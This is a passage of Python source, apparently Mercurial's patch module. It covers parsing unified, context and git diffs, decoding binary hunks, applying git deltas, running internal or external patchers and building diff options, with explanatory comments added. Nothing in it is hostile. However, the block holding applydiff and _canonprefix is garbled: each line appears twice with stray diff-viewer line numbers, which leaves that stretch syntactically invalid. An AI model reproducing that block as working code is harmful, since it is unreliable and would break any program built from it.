            if l <= 'Z' and l >= 'A':
                l = ord(l) - ord('A') + 1
            else:
                l = ord(l) - ord('a') + 27
            try:
                dec.append(util.b85decode(line[1:])[:l])
            except ValueError as e:
                raise PatchError(_('could not decode "%s" binary patch: %s')
                                 % (self._fname, stringutil.forcebytestr(e)))
            line = getline(lr, self.hunk)
        text = zlib.decompress(''.join(dec))
        if len(text) != size:
            raise PatchError(_('"%s" length is %d bytes, should be %d')
                             % (self._fname, len(text), size))
        self.text = text

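# Each base85 line of a git binary hunk starts with one character encoding
# the decoded byte count, 'A'..'Z' for 1..26 and 'a'..'z' for 27..52, as
# decoded inside binhunk._read() above. A hypothetical standalone helper
# mirroring that decoding:
def _b85linelen(c):
    # illustration only; not used by the patching code
    if 'A' <= c <= 'Z':
        return ord(c) - ord('A') + 1
    return ord(c) - ord('a') + 27
# _b85linelen('A') == 1; _b85linelen('z') == 52
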
def parsefilename(str):
    # --- filename \t|space stuff
    s = str[4:].rstrip('\r\n')
    i = s.find('\t')
    if i < 0:
        i = s.find(' ')
        if i < 0:
            return s
    return s[:i]

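# parsefilename() receives the whole '--- '/'+++ ' line and keeps whatever
# sits between the 4-byte marker and the first tab or space, e.g.:
#
#     parsefilename('--- a/foo.c\t2018-06-01 12:00:00')  # -> 'a/foo.c'
#     parsefilename('+++ b/foo.c')                       # -> 'b/foo.c'
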
def reversehunks(hunks):
    '''reverse the signs in the hunks given as argument

    This function operates on hunks coming out of patch.filterpatch, that is
    a list of the form: [header1, hunk1, hunk2, header2...]. Example usage:

    >>> rawpatch = b"""diff --git a/folder1/g b/folder1/g
    ... --- a/folder1/g
    ... +++ b/folder1/g
    ... @@ -1,7 +1,7 @@
    ... +firstline
    ...  c
    ...  1
    ...  2
    ... + 3
    ... -4
    ...  5
    ...  d
    ... +lastline"""
    >>> hunks = parsepatch([rawpatch])
    >>> hunkscomingfromfilterpatch = []
    >>> for h in hunks:
    ...     hunkscomingfromfilterpatch.append(h)
    ...     hunkscomingfromfilterpatch.extend(h.hunks)

    >>> reversedhunks = reversehunks(hunkscomingfromfilterpatch)
    >>> from . import util
    >>> fp = util.stringio()
    >>> for c in reversedhunks:
    ...      c.write(fp)
    >>> fp.seek(0) or None
    >>> reversedpatch = fp.read()
    >>> print(pycompat.sysstr(reversedpatch))
    diff --git a/folder1/g b/folder1/g
    --- a/folder1/g
    +++ b/folder1/g
    @@ -1,4 +1,3 @@
    -firstline
     c
     1
     2
    @@ -2,6 +1,6 @@
     c
     1
     2
    - 3
    +4
     5
     d
    @@ -6,3 +5,2 @@
     5
     d
    -lastline

    '''

    newhunks = []
    for c in hunks:
        if util.safehasattr(c, 'reversehunk'):
            c = c.reversehunk()
        newhunks.append(c)
    return newhunks

def parsepatch(originalchunks, maxcontext=None):
    """patch -> [] of headers -> [] of hunks

    If maxcontext is not None, trim context lines if necessary.

    >>> rawpatch = b'''diff --git a/folder1/g b/folder1/g
    ... --- a/folder1/g
    ... +++ b/folder1/g
    ... @@ -1,8 +1,10 @@
    ...  1
    ...  2
    ... -3
    ...  4
    ...  5
    ...  6
    ... +6.1
    ... +6.2
    ...  7
    ...  8
    ... +9'''
    >>> out = util.stringio()
    >>> headers = parsepatch([rawpatch], maxcontext=1)
    >>> for header in headers:
    ...     header.write(out)
    ...     for hunk in header.hunks:
    ...         hunk.write(out)
    >>> print(pycompat.sysstr(out.getvalue()))
    diff --git a/folder1/g b/folder1/g
    --- a/folder1/g
    +++ b/folder1/g
    @@ -2,3 +2,2 @@
     2
    -3
     4
    @@ -6,2 +5,4 @@
     6
    +6.1
    +6.2
     7
    @@ -8,1 +9,2 @@
     8
    +9
    """
    class parser(object):
        """patch parsing state machine"""
        def __init__(self):
            self.fromline = 0
            self.toline = 0
            self.proc = ''
            self.header = None
            self.context = []
            self.before = []
            self.hunk = []
            self.headers = []

        def addrange(self, limits):
            fromstart, fromend, tostart, toend, proc = limits
            self.fromline = int(fromstart)
            self.toline = int(tostart)
            self.proc = proc

        def addcontext(self, context):
            if self.hunk:
                h = recordhunk(self.header, self.fromline, self.toline,
                        self.proc, self.before, self.hunk, context, maxcontext)
                self.header.hunks.append(h)
                self.fromline += len(self.before) + h.removed
                self.toline += len(self.before) + h.added
                self.before = []
                self.hunk = []
            self.context = context

        def addhunk(self, hunk):
            if self.context:
                self.before = self.context
                self.context = []
            self.hunk = hunk

        def newfile(self, hdr):
            self.addcontext([])
            h = header(hdr)
            self.headers.append(h)
            self.header = h

        def addother(self, line):
            pass # 'other' lines are ignored

        def finished(self):
            self.addcontext([])
            return self.headers

        transitions = {
            'file': {'context': addcontext,
                     'file': newfile,
                     'hunk': addhunk,
                     'range': addrange},
            'context': {'file': newfile,
                        'hunk': addhunk,
                        'range': addrange,
                        'other': addother},
            'hunk': {'context': addcontext,
                     'file': newfile,
                     'range': addrange},
            'range': {'context': addcontext,
                      'hunk': addhunk},
            'other': {'other': addother},
        }

    p = parser()
    fp = stringio()
    fp.write(''.join(originalchunks))
    fp.seek(0)

    state = 'context'
    for newstate, data in scanpatch(fp):
        try:
            p.transitions[state][newstate](p, data)
        except KeyError:
            raise PatchError('unhandled transition: %s -> %s' %
                             (state, newstate))
        state = newstate
    del fp
    return p.finished()

def pathtransform(path, strip, prefix):
    '''turn a path from a patch into a path suitable for the repository

    prefix, if not empty, is expected to be normalized with a / at the end.

    Returns (stripped components, path in repository).

    >>> pathtransform(b'a/b/c', 0, b'')
    ('', 'a/b/c')
    >>> pathtransform(b'   a/b/c   ', 0, b'')
    ('', '   a/b/c')
    >>> pathtransform(b'   a/b/c   ', 2, b'')
    ('a/b/', 'c')
    >>> pathtransform(b'a/b/c', 0, b'd/e/')
    ('', 'd/e/a/b/c')
    >>> pathtransform(b'   a//b/c   ', 2, b'd/e/')
    ('a//b/', 'd/e/c')
    >>> pathtransform(b'a/b/c', 3, b'')
    Traceback (most recent call last):
    PatchError: unable to strip away 1 of 3 dirs from a/b/c
    '''
    pathlen = len(path)
    i = 0
    if strip == 0:
        return '', prefix + path.rstrip()
    count = strip
    while count > 0:
        i = path.find('/', i)
        if i == -1:
            raise PatchError(_("unable to strip away %d of %d dirs from %s") %
                             (count, strip, path))
        i += 1
        # consume '//' in the path
        while i < pathlen - 1 and path[i:i + 1] == '/':
            i += 1
        count -= 1
    return path[:i].lstrip(), prefix + path[i:].rstrip()

def makepatchmeta(backend, afile_orig, bfile_orig, hunk, strip, prefix):
    nulla = afile_orig == "/dev/null"
    nullb = bfile_orig == "/dev/null"
    create = nulla and hunk.starta == 0 and hunk.lena == 0
    remove = nullb and hunk.startb == 0 and hunk.lenb == 0
    abase, afile = pathtransform(afile_orig, strip, prefix)
    gooda = not nulla and backend.exists(afile)
    bbase, bfile = pathtransform(bfile_orig, strip, prefix)
    if afile == bfile:
        goodb = gooda
    else:
        goodb = not nullb and backend.exists(bfile)
    missing = not goodb and not gooda and not create

    # some diff programs apparently produce patches where the afile is
    # not /dev/null, but afile starts with bfile
    abasedir = afile[:afile.rfind('/') + 1]
    bbasedir = bfile[:bfile.rfind('/') + 1]
    if (missing and abasedir == bbasedir and afile.startswith(bfile)
        and hunk.starta == 0 and hunk.lena == 0):
        create = True
        missing = False

    # If afile is "a/b/foo" and bfile is "a/b/foo.orig" we assume the
    # diff is between a file and its backup. In this case, the original
    # file should be patched (see original mpatch code).
    isbackup = (abase == bbase and bfile.startswith(afile))
    fname = None
    if not missing:
        if gooda and goodb:
            if isbackup:
                fname = afile
            else:
                fname = bfile
        elif gooda:
            fname = afile

    if not fname:
        if not nullb:
            if isbackup:
                fname = afile
            else:
                fname = bfile
        elif not nulla:
            fname = afile
        else:
            raise PatchError(_("undefined source and destination files"))

    gp = patchmeta(fname)
    if create:
        gp.op = 'ADD'
    elif remove:
        gp.op = 'DELETE'
    return gp

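# The create/remove detection above reduces to simple predicates on the
# first hunk: a patch whose old side is /dev/null with a '@@ -0,0 +1,3 @@'
# range describes a file creation (op 'ADD'), and the mirror image, a
# /dev/null new side with '@@ -1,3 +0,0 @@', describes a deletion
# (op 'DELETE').
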
def scanpatch(fp):
    """like patch.iterhunks, but yield different events

    - ('file',    [header_lines + fromfile + tofile])
    - ('context', [context_lines])
    - ('hunk',    [hunk_lines])
    - ('range',   (-start,len, +start,len, proc))
    """
    lines_re = re.compile(br'@@ -(\d+),(\d+) \+(\d+),(\d+) @@\s*(.*)')
    lr = linereader(fp)

    def scanwhile(first, p):
        """scan lr while predicate holds"""
        lines = [first]
        for line in iter(lr.readline, ''):
            if p(line):
                lines.append(line)
            else:
                lr.push(line)
                break
        return lines

    for line in iter(lr.readline, ''):
        if line.startswith('diff --git a/') or line.startswith('diff -r '):
            def notheader(line):
                s = line.split(None, 1)
                return not s or s[0] not in ('---', 'diff')
            header = scanwhile(line, notheader)
            fromfile = lr.readline()
            if fromfile.startswith('---'):
                tofile = lr.readline()
                header += [fromfile, tofile]
            else:
                lr.push(fromfile)
            yield 'file', header
        elif line.startswith(' '):
            cs = (' ', '\\')
            yield 'context', scanwhile(line, lambda l: l.startswith(cs))
        elif line.startswith(('-', '+')):
            cs = ('-', '+', '\\')
            yield 'hunk', scanwhile(line, lambda l: l.startswith(cs))
        else:
            m = lines_re.match(line)
            if m:
                yield 'range', m.groups()
            else:
                yield 'other', line

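# For a small git diff such as
#
#     diff --git a/f b/f
#     --- a/f
#     +++ b/f
#     @@ -1,2 +1,2 @@
#      unchanged
#     -old
#     +new
#
# scanpatch() would yield roughly this event stream (values are bytes):
#
#     ('file',    [b'diff --git a/f b/f\n', b'--- a/f\n', b'+++ b/f\n'])
#     ('range',   (b'1', b'2', b'1', b'2', b''))
#     ('context', [b' unchanged\n'])
#     ('hunk',    [b'-old\n', b'+new\n'])
#
# which is exactly what parsepatch()'s transitions table consumes.
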
def scangitpatch(lr, firstline):
    """
    Git patches can emit:
    - rename a to b
    - change b
    - copy a to c
    - change c

    We cannot apply this sequence as-is, the renamed 'a' could not be
    found for it would have been renamed already. And we cannot copy
    from 'b' instead because 'b' would have been changed already. So
    we scan the git patch for copy and rename commands so we can
    perform the copies ahead of time.
    """
    pos = 0
    try:
        pos = lr.fp.tell()
        fp = lr.fp
    except IOError:
        fp = stringio(lr.fp.read())
    gitlr = linereader(fp)
    gitlr.push(firstline)
    gitpatches = readgitpatch(gitlr)
    fp.seek(pos)
    return gitpatches

def iterhunks(fp):
    """Read a patch and yield the following events:
    - ("file", afile, bfile, firsthunk): select a new target file.
    - ("hunk", hunk): a new hunk is ready to be applied, follows a
    "file" event.
    - ("git", gitchanges): current diff is in git format, gitchanges
    maps filenames to gitpatch records. Unique event.
    """
    afile = ""
    bfile = ""
    state = None
    hunknum = 0
    emitfile = newfile = False
    gitpatches = None

    # our states
    BFILE = 1
    context = None
    lr = linereader(fp)

    for x in iter(lr.readline, ''):
        if state == BFILE and (
            (not context and x.startswith('@'))
            or (context is not False and x.startswith('***************'))
            or x.startswith('GIT binary patch')):
            gp = None
            if (gitpatches and
                gitpatches[-1].ispatching(afile, bfile)):
                gp = gitpatches.pop()
            if x.startswith('GIT binary patch'):
                h = binhunk(lr, gp.path)
            else:
                if context is None and x.startswith('***************'):
                    context = True
                h = hunk(x, hunknum + 1, lr, context)
            hunknum += 1
            if emitfile:
                emitfile = False
                yield 'file', (afile, bfile, h, gp and gp.copy() or None)
            yield 'hunk', h
        elif x.startswith('diff --git a/'):
            m = gitre.match(x.rstrip(' \r\n'))
            if not m:
                continue
            if gitpatches is None:
                # scan whole input for git metadata
                gitpatches = scangitpatch(lr, x)
                yield 'git', [g.copy() for g in gitpatches
                              if g.op in ('COPY', 'RENAME')]
                gitpatches.reverse()
            afile = 'a/' + m.group(1)
            bfile = 'b/' + m.group(2)
            while gitpatches and not gitpatches[-1].ispatching(afile, bfile):
                gp = gitpatches.pop()
                yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
            if not gitpatches:
                raise PatchError(_('failed to synchronize metadata for "%s"')
                                 % afile[2:])
            gp = gitpatches[-1]
            newfile = True
        elif x.startswith('---'):
            # check for a unified diff
            l2 = lr.readline()
            if not l2.startswith('+++'):
                lr.push(l2)
                continue
            newfile = True
            context = False
            afile = parsefilename(x)
            bfile = parsefilename(l2)
        elif x.startswith('***'):
            # check for a context diff
            l2 = lr.readline()
            if not l2.startswith('---'):
                lr.push(l2)
                continue
            l3 = lr.readline()
            lr.push(l3)
            if not l3.startswith("***************"):
                lr.push(l2)
                continue
            newfile = True
            context = True
            afile = parsefilename(x)
            bfile = parsefilename(l2)

        if newfile:
            newfile = False
            emitfile = True
            state = BFILE
            hunknum = 0

    while gitpatches:
        gp = gitpatches.pop()
        yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())

def applybindelta(binchunk, data):
    """Apply a binary delta hunk
    The algorithm used is the algorithm from git's patch-delta.c
    """
    def deltahead(binchunk):
        i = 0
        for c in pycompat.bytestr(binchunk):
            i += 1
            if not (ord(c) & 0x80):
                return i
        return i
    out = ""
    s = deltahead(binchunk)
    binchunk = binchunk[s:]
    s = deltahead(binchunk)
    binchunk = binchunk[s:]
    i = 0
    while i < len(binchunk):
        cmd = ord(binchunk[i:i + 1])
        i += 1
        if (cmd & 0x80):
            offset = 0
            size = 0
            if (cmd & 0x01):
                offset = ord(binchunk[i:i + 1])
                i += 1
            if (cmd & 0x02):
                offset |= ord(binchunk[i:i + 1]) << 8
                i += 1
            if (cmd & 0x04):
                offset |= ord(binchunk[i:i + 1]) << 16
                i += 1
            if (cmd & 0x08):
                offset |= ord(binchunk[i:i + 1]) << 24
                i += 1
            if (cmd & 0x10):
                size = ord(binchunk[i:i + 1])
                i += 1
            if (cmd & 0x20):
                size |= ord(binchunk[i:i + 1]) << 8
                i += 1
            if (cmd & 0x40):
                size |= ord(binchunk[i:i + 1]) << 16
                i += 1
            if size == 0:
                size = 0x10000
            offset_end = offset + size
            out += data[offset:offset_end]
        elif cmd != 0:
            offset_end = i + cmd
            out += binchunk[i:offset_end]
            i += cmd
        else:
            raise PatchError(_('unexpected delta opcode 0'))
    return out

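# After the two varint size headers, a delta is a sequence of opcodes. A
# command byte with the high bit set copies from the source: its low bits
# say which offset/size bytes follow. For example, the bytes
# 0x91 0x02 0x05 decode as
#
#     0x91 & 0x80 -> copy command
#     0x91 & 0x01 -> one offset byte follows: offset = 0x02
#     0x91 & 0x10 -> one size byte follows:   size   = 0x05
#
# i.e. "copy 5 bytes of source data starting at offset 2". A command byte
# in 0x01..0x7f inserts that many literal bytes from the delta itself, and
# 0x00 is rejected above as an unexpected opcode.
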
1998 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1999 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1999 """Reads a patch from fp and tries to apply it.
2000 """Reads a patch from fp and tries to apply it.
2000
2001
2001 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
2002 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
2002 there was any fuzz.
2003 there was any fuzz.
2003
2004
2004 If 'eolmode' is 'strict', the patch content and patched file are
2005 If 'eolmode' is 'strict', the patch content and patched file are
2005 read in binary mode. Otherwise, line endings are ignored when
2006 read in binary mode. Otherwise, line endings are ignored when
2006 patching then normalized according to 'eolmode'.
2007 patching then normalized according to 'eolmode'.
2007 """
2008 """
2008 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
2009 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
2009 prefix=prefix, eolmode=eolmode)
2010 prefix=prefix, eolmode=eolmode)
2010
2011
2011 def _canonprefix(repo, prefix):
2012 def _canonprefix(repo, prefix):
2012 if prefix:
2013 if prefix:
2013 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2014 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2014 if prefix != '':
2015 if prefix != '':
2015 prefix += '/'
2016 prefix += '/'
2016 return prefix
2017 return prefix

def _applydiff(ui, fp, patcher, backend, store, strip=1, prefix='',
               eolmode='strict'):
    prefix = _canonprefix(backend.repo, prefix)
    def pstrip(p):
        return pathtransform(p, strip - 1, prefix)[1]

    rejects = 0
    err = 0
    current_file = None

    for state, values in iterhunks(fp):
        if state == 'hunk':
            if not current_file:
                continue
            ret = current_file.apply(values)
            if ret > 0:
                err = 1
        elif state == 'file':
            if current_file:
                rejects += current_file.close()
                current_file = None
            afile, bfile, first_hunk, gp = values
            if gp:
                gp.path = pstrip(gp.path)
                if gp.oldpath:
                    gp.oldpath = pstrip(gp.oldpath)
            else:
                gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
                                   prefix)
            if gp.op == 'RENAME':
                backend.unlink(gp.oldpath)
            if not first_hunk:
                if gp.op == 'DELETE':
                    backend.unlink(gp.path)
                    continue
                data, mode = None, None
                if gp.op in ('RENAME', 'COPY'):
                    data, mode = store.getfile(gp.oldpath)[:2]
                    if data is None:
                        # This means that the old path does not exist
                        raise PatchError(_("source file '%s' does not exist")
                                         % gp.oldpath)
                if gp.mode:
                    mode = gp.mode
                    if gp.op == 'ADD':
                        # Added files without content have no hunk and
                        # must be created
                        data = ''
                if data or mode:
                    if (gp.op in ('ADD', 'RENAME', 'COPY')
                        and backend.exists(gp.path)):
                        raise PatchError(_("cannot create %s: destination "
                                           "already exists") % gp.path)
                    backend.setfile(gp.path, data, mode, gp.oldpath)
                continue
            try:
                current_file = patcher(ui, gp, backend, store,
                                       eolmode=eolmode)
            except PatchError as inst:
                ui.warn(str(inst) + '\n')
                current_file = None
                rejects += 1
                continue
        elif state == 'git':
            for gp in values:
                path = pstrip(gp.oldpath)
                data, mode = backend.getfile(path)
                if data is None:
                    # The error ignored here will trigger a getfile()
                    # error in a place more appropriate for error
                    # handling, and will not interrupt the patching
                    # process.
                    pass
                else:
                    store.setfile(path, data, mode)
        else:
            raise error.Abort(_('unsupported parser state: %s') % state)

    if current_file:
        rejects += current_file.close()

    if rejects:
        return -1
    return err
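
# For orientation, a hedged sketch of the (state, values) stream iterhunks()
# feeds into the loop above (shapes are illustrative, not a spec):
#
#     ('git',  [gitpatch, ...])                       # git metadata, up front
#     ('file', (afile, bfile, first_hunk, gitpatch))  # a new file begins
#     ('hunk', hunk)                                  # zero or more per file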

def _externalpatch(ui, repo, patcher, patchname, strip, files,
                   similarity):
    """use <patcher> to apply <patchname> to the working directory.
    returns whether patch was applied with fuzz factor."""

    fuzz = False
    args = []
    cwd = repo.root
    if cwd:
        args.append('-d %s' % procutil.shellquote(cwd))
    cmd = ('%s %s -p%d < %s'
           % (patcher, ' '.join(args), strip, procutil.shellquote(patchname)))
    ui.debug('Using external patch tool: %s\n' % cmd)
    fp = procutil.popen(cmd, 'rb')
    try:
        for line in util.iterfile(fp):
            line = line.rstrip()
            ui.note(line + '\n')
            if line.startswith('patching file '):
                pf = util.parsepatchoutput(line)
                printed_file = False
                files.add(pf)
            elif line.find('with fuzz') >= 0:
                fuzz = True
                if not printed_file:
                    ui.warn(pf + '\n')
                    printed_file = True
                ui.warn(line + '\n')
            elif line.find('saving rejects to file') >= 0:
                ui.warn(line + '\n')
            elif line.find('FAILED') >= 0:
                if not printed_file:
                    ui.warn(pf + '\n')
                    printed_file = True
                ui.warn(line + '\n')
    finally:
        if files:
            scmutil.marktouched(repo, files, similarity)
    code = fp.close()
    if code:
        raise PatchError(_("patch command failed: %s") %
                         procutil.explainexit(code))
    return fuzz
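
# Example (hedged): the external tool used above is selected by the 'ui.patch'
# config that patch() below reads; a sketch of forcing it from code, assuming
# an existing `ui` and `repo` and a GNU patch binary on $PATH:
#
#     ui.setconfig('ui', 'patch', 'patch', 'example')
#     fuzz = patch(ui, repo, 'fix.diff', strip=1)  # routes to _externalpatch()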

def patchbackend(ui, backend, patchobj, strip, prefix, files=None,
                 eolmode='strict'):
    if files is None:
        files = set()
    if eolmode is None:
        eolmode = ui.config('patch', 'eol')
    if eolmode.lower() not in eolmodes:
        raise error.Abort(_('unsupported line endings type: %s') % eolmode)
    eolmode = eolmode.lower()

    store = filestore()
    try:
        fp = open(patchobj, 'rb')
    except TypeError:
        fp = patchobj
    try:
        ret = applydiff(ui, fp, backend, store, strip=strip, prefix=prefix,
                        eolmode=eolmode)
    finally:
        if fp != patchobj:
            fp.close()
        files.update(backend.close())
        store.close()
    if ret < 0:
        raise PatchError(_('patch failed to apply'))
    return ret > 0

def internalpatch(ui, repo, patchobj, strip, prefix='', files=None,
                  eolmode='strict', similarity=0):
    """use builtin patch to apply <patchobj> to the working directory.
    returns whether patch was applied with fuzz factor."""
    backend = workingbackend(ui, repo, similarity)
    return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)

def patchrepo(ui, repo, ctx, store, patchobj, strip, prefix, files=None,
              eolmode='strict'):
    backend = repobackend(ui, repo, ctx, store)
    return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)

def patch(ui, repo, patchname, strip=1, prefix='', files=None, eolmode='strict',
          similarity=0):
    """Apply <patchname> to the working directory.

    'eolmode' specifies how end of lines should be handled. It can be:
    - 'strict': inputs are read in binary mode, EOLs are preserved
    - 'crlf': EOLs are ignored when patching and reset to CRLF
    - 'lf': EOLs are ignored when patching and reset to LF
    - None: get it from user settings, default to 'strict'
    'eolmode' is ignored when using an external patcher program.

    Returns whether patch was applied with fuzz factor.
    """
    patcher = ui.config('ui', 'patch')
    if files is None:
        files = set()
    if patcher:
        return _externalpatch(ui, repo, patcher, patchname, strip,
                              files, similarity)
    return internalpatch(ui, repo, patchname, strip, prefix, files, eolmode,
                         similarity)
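
# Example (hedged): applying a patch file to the working directory, assuming
# an existing `ui` and `repo` and a hypothetical patch file 'fix.diff':
#
#     try:
#         fuzz = patch(ui, repo, 'fix.diff', strip=1)
#         if fuzz:
#             ui.warn('patch applied with fuzz\n')
#     except PatchError as inst:
#         ui.warn('apply failed: %s\n' % inst)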

def changedfiles(ui, repo, patchpath, strip=1, prefix=''):
    backend = fsbackend(ui, repo.root)
    prefix = _canonprefix(repo, prefix)
    with open(patchpath, 'rb') as fp:
        changed = set()
        for state, values in iterhunks(fp):
            if state == 'file':
                afile, bfile, first_hunk, gp = values
                if gp:
                    gp.path = pathtransform(gp.path, strip - 1, prefix)[1]
                    if gp.oldpath:
                        gp.oldpath = pathtransform(gp.oldpath, strip - 1,
                                                   prefix)[1]
                else:
                    gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
                                       prefix)
                changed.add(gp.path)
                if gp.op == 'RENAME':
                    changed.add(gp.oldpath)
            elif state not in ('hunk', 'git'):
                raise error.Abort(_('unsupported parser state: %s') % state)
        return changed
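
# Example (hedged): because changedfiles() only parses the patch (through
# fsbackend) and never touches the working copy, it works as a pre-flight
# check; 'fix.diff' is a hypothetical path:
#
#     for f in sorted(changedfiles(ui, repo, 'fix.diff', strip=1)):
#         ui.status('%s\n' % f)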

class GitDiffRequired(Exception):
    pass

def diffallopts(ui, opts=None, untrusted=False, section='diff'):
    '''return diffopts with all features supported and parsed'''
    return difffeatureopts(ui, opts=opts, untrusted=untrusted, section=section,
                           git=True, whitespace=True, formatchanging=True)

diffopts = diffallopts

def difffeatureopts(ui, opts=None, untrusted=False, section='diff', git=False,
                    whitespace=False, formatchanging=False):
    '''return diffopts with only opted-in features parsed

    Features:
    - git: git-style diffs
    - whitespace: whitespace options like ignoreblanklines and ignorews
    - formatchanging: options that will likely break or cause correctness issues
      with most diff parsers
    '''
    def get(key, name=None, getter=ui.configbool, forceplain=None):
        if opts:
            v = opts.get(key)
            # diffopts flags are either None-default (which is passed
            # through unchanged, so we can identify unset values), or
            # some other falsey default (eg --unified, which defaults
            # to an empty string). We only want to override the config
            # entries from hgrc with command line values if they
            # appear to have been set, which is any truthy value,
            # True, or False.
            if v or isinstance(v, bool):
                return v
        if forceplain is not None and ui.plain():
            return forceplain
        return getter(section, name or key, untrusted=untrusted)

    # core options, expected to be understood by every diff parser
    buildopts = {
        'nodates': get('nodates'),
        'showfunc': get('show_function', 'showfunc'),
        'context': get('unified', getter=ui.config),
    }
    buildopts['worddiff'] = ui.configbool('experimental', 'worddiff')
    buildopts['xdiff'] = ui.configbool('experimental', 'xdiff')

    if git:
        buildopts['git'] = get('git')

        # since this is in the experimental section, we need to call
        # ui.configbool directly
        buildopts['showsimilarity'] = ui.configbool('experimental',
                                                    'extendedheader.similarity')

        # need to inspect the ui object instead of using get() since we want to
        # test for an int
        hconf = ui.config('experimental', 'extendedheader.index')
        if hconf is not None:
            hlen = None
            try:
                # the hash config could be an integer (for length of hash) or a
                # word (e.g. short, full, none)
                hlen = int(hconf)
                if hlen < 0 or hlen > 40:
                    msg = _("invalid length for extendedheader.index: '%d'\n")
                    ui.warn(msg % hlen)
            except ValueError:
                # default value
                if hconf == 'short' or hconf == '':
                    hlen = 12
                elif hconf == 'full':
                    hlen = 40
                elif hconf != 'none':
                    msg = _("invalid value for extendedheader.index: '%s'\n")
                    ui.warn(msg % hconf)
            finally:
                buildopts['index'] = hlen

    if whitespace:
        buildopts['ignorews'] = get('ignore_all_space', 'ignorews')
        buildopts['ignorewsamount'] = get('ignore_space_change',
                                          'ignorewsamount')
        buildopts['ignoreblanklines'] = get('ignore_blank_lines',
                                            'ignoreblanklines')
        buildopts['ignorewseol'] = get('ignore_space_at_eol', 'ignorewseol')
    if formatchanging:
        buildopts['text'] = opts and opts.get('text')
        binary = None if opts is None else opts.get('binary')
        buildopts['nobinary'] = (not binary if binary is not None
                                 else get('nobinary', forceplain=False))
        buildopts['noprefix'] = get('noprefix', forceplain=False)

    return mdiff.diffopts(**pycompat.strkwargs(buildopts))
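
# Example (hedged): building diff options, assuming a configured `ui`. The
# first form is what full-featured commands effectively use; the second opts
# in to git headers only:
#
#     opts = diffallopts(ui, opts={'git': True})
#     opts = difffeatureopts(ui, opts={'git': True}, git=True)
#     assert opts.git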

def diff(repo, node1=None, node2=None, match=None, changes=None,
         opts=None, losedatafn=None, prefix='', relroot='', copy=None,
         hunksfilterfn=None):
    '''yields diff of changes to files between two nodes, or node and
    working directory.

    if node1 is None, use first dirstate parent instead.
    if node2 is None, compare node1 with working directory.

    losedatafn(**kwarg) is a callable run when opts.upgrade=True and
    every time some change cannot be represented with the current
    patch format. Return False to upgrade to git patch format, True to
    accept the loss or raise an exception to abort the diff. It is
    called with the name of current file being diffed as 'fn'. If set
    to None, patches will always be upgraded to git format when
    necessary.

    prefix is a filename prefix that is prepended to all filenames on
    display (used for subrepos).

    relroot, if not empty, must be normalized with a trailing /. Any match
    patterns that fall outside it will be ignored.

    copy, if not empty, should contain mappings {dst@y: src@x} of copy
    information.

    hunksfilterfn, if not None, should be a function taking a filectx and
    hunks generator that may yield filtered hunks.
    '''
    for fctx1, fctx2, hdr, hunks in diffhunks(
            repo, node1=node1, node2=node2,
            match=match, changes=changes, opts=opts,
            losedatafn=losedatafn, prefix=prefix, relroot=relroot, copy=copy,
    ):
        if hunksfilterfn is not None:
            # If the file has been removed, fctx2 is None; but this should
            # not occur here since we catch removed files early in
            # logcmdutil.getlinerangerevs() for 'hg log -L'.
            assert fctx2 is not None, \
                'fctx2 unexpectedly None in diff hunks filtering'
            hunks = hunksfilterfn(fctx2, hunks)
        text = ''.join(sum((list(hlines) for hrange, hlines in hunks), []))
        if hdr and (text or len(hdr) > 1):
            yield '\n'.join(hdr) + '\n'
        if text:
            yield text
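
# Example (hedged): diff() yields text blocks, so rendering a whole unified
# diff is a join; this sketch diffs the working directory against its parent,
# assuming `repo` is available:
#
#     chunks = diff(repo, opts=diffallopts(repo.ui))
#     repo.ui.write(''.join(chunks))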

def diffhunks(repo, node1=None, node2=None, match=None, changes=None,
              opts=None, losedatafn=None, prefix='', relroot='', copy=None):
    """Yield diff of changes to files in the form of (`header`, `hunks`) tuples
    where `header` is a list of diff headers and `hunks` is an iterable of
    (`hunkrange`, `hunklines`) tuples.

    See diff() for the meaning of parameters.
    """

    if opts is None:
        opts = mdiff.defaultopts

    if not node1 and not node2:
        node1 = repo.dirstate.p1()

    def lrugetfilectx():
        cache = {}
        order = collections.deque()
        def getfilectx(f, ctx):
            fctx = ctx.filectx(f, filelog=cache.get(f))
            if f not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[f] = fctx.filelog()
            else:
                order.remove(f)
            order.append(f)
            return fctx
        return getfilectx
    getfilectx = lrugetfilectx()

    ctx1 = repo[node1]
    ctx2 = repo[node2]

    relfiltered = False
    if relroot != '' and match.always():
        # as a special case, create a new matcher with just the relroot
        pats = [relroot]
        match = scmutil.match(ctx2, pats, default='path')
        relfiltered = True

    if not changes:
        changes = repo.status(ctx1, ctx2, match=match)
    modified, added, removed = changes[:3]

    if not modified and not added and not removed:
        return []

    if repo.ui.debugflag:
        hexfunc = hex
    else:
        hexfunc = short
    revs = [hexfunc(node) for node in [ctx1.node(), ctx2.node()] if node]

    if copy is None:
        copy = {}
        if opts.git or opts.upgrade:
            copy = copies.pathcopies(ctx1, ctx2, match=match)

    if relroot is not None:
        if not relfiltered:
            # XXX this would ideally be done in the matcher, but that is
            # generally meant to 'or' patterns, not 'and' them. In this case we
            # need to 'and' all the patterns from the matcher with relroot.
            def filterrel(l):
                return [f for f in l if f.startswith(relroot)]
            modified = filterrel(modified)
            added = filterrel(added)
            removed = filterrel(removed)
            relfiltered = True
        # filter out copies where either side isn't inside the relative root
        copy = dict(((dst, src) for (dst, src) in copy.iteritems()
                     if dst.startswith(relroot)
                     and src.startswith(relroot)))

    modifiedset = set(modified)
    addedset = set(added)
    removedset = set(removed)
    for f in modified:
        if f not in ctx1:
            # Fix up added, since merged-in additions appear as
            # modifications during merges
            modifiedset.remove(f)
            addedset.add(f)
    for f in removed:
        if f not in ctx1:
            # Merged-in additions that are then removed are reported as removed.
            # They are not in ctx1, so we don't want to show them in the diff.
            removedset.remove(f)
